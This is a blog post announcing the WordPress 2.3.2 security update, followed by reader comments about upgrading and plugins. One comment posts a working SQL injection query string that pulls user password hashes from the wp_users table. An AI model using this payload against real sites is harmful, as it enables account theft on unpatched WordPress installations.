WordPress has just released an urgent security update for the 2.3 series. If you’re blog is powered by WordPress 2.3, then you should upgrade to this latest version right away. The upgrade fixes a security bug that allows people to view your timestamped posts. You may have seen a few posts around Blogsphere showing how to see what Shoemoney is going to post tomorrow. Well, once Shoe upgrades his WordPress, you won’t be able to do that anymore.
WordPress 2.3.2 also suppresses some error messages that can give away information about your database table structure and limits and stops some information leaks in the XML-RPC and APP implementations. There’s also a bonus that allows you to define a custom DB error page. See the full list of changes here.
This is not a major release and as such it will not change your DB structure. Upgrading should be as easy as uploading and replacing the old WordPress files. That’s what I did anyway. You can see a list of full bug fixes here.
WordPress Never Stop !!
Well at least they do improve and serve us with more secure platform rather than just ignore the bugs.
I know that if you know the URL of a post you can view it before it goes live but I didn’t know there was another way.
I better go update now.
does anybody else know, how? it could be cool as a little test
I noticed the time stamp issue and thought that it shouldn’t work that way, but then just dismissed it. I guess that for the A-list bloggers, it could be detrimental for others to see your post before it’s officially published.
Thanks! I probably wouldn’t have updated until much later if it wasn’t for this post π
Thanks, i’ll be upgrading my blog shortly. π
Good catch and good explanation, John. Funny, I took more than an hour off to drink coffee and work down the list of un-reads in my feedreader this morning and I didn’t come across anyone else mentioning this until I got to you (saving the best ’til last ;-)).
I highly recommend techie-buzz’s automatic update plug-in. makes these upgrades a snap and also let’s you do backup as part of the process very painlessly. It’s available at:
http://techie-buzz.com/wordpress-plugins/wordpress-automatic-upgrade-plugin.html
for those who hate manual piece by piece updating.
Thanks for the info John… and thanks for the link to the WordPress plugin Dave, it’s gonna make updating all my blogs that much faster! π
Good work Mr Chow. I just read it here first! The automatic updater you turned me on to wrks a treat as well. Cheers! π
Yes I saw on my blog Dashboard about New Version Update i didnt update yet , I wanna do this soon π
Darn! If only I knew about this earlier, so I could have sneaked into posts π
-Mike
Dam, I’ve like 6 blogs that will need updating. Thanks for the heads up.
use the plugin..it will be easier and fun π
no one can read my timestamped posts π
goooooo wordpress!
Thanks a lot for the heads up!
For people who want to have a full secure on his work or personal detail, upgrading would be a good idea. Thanks for showing us John.
Thanks for the heads up
Newbie question. I’ve never done this before. Will I lose all of the tweaks, such as custom header, installed widgets, and other stuff that I’ve done?
If so, is there an easy way to get everything back? I just don’t want to end up back at the basic Kubrick design. Thanks a lot.
No you will not lose those.Made a backup anyway before upgrading.
Will do. Thank you.
I’m still updating. Heck, I never knew you could see what Shoe was posting, before he posted it.
Thx for the tip.
WordPress just continues to updates and give the best to it’s users.
Thanks for the heads up on this John.
Thank you for the info about the update. Security is the first. π
After the upgrade several of my plug-ins stopped working. Specifically, Brian’s Threaded Comments, and WP-Cache. Anyone else running into this? My comments look terrible now.
I know what I did find, my theme no longer displays correctly, I had to go back to 2.3.1 to get it to work properly again.
Here technical reason documentation.
=== WordPress Charset SQL Injection Vulnerability ===
exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
I don’t know if I’m going to upgrade right away or not. Decisions, decisions.
Thanks for reporting it, John. My blog jumped from 50 to 200 subscribers today. π
For many, they rather people read their timestamp posts since it gives them one more visitors π
“If youβre blog is powered by WordPress”
No, I am not a blog.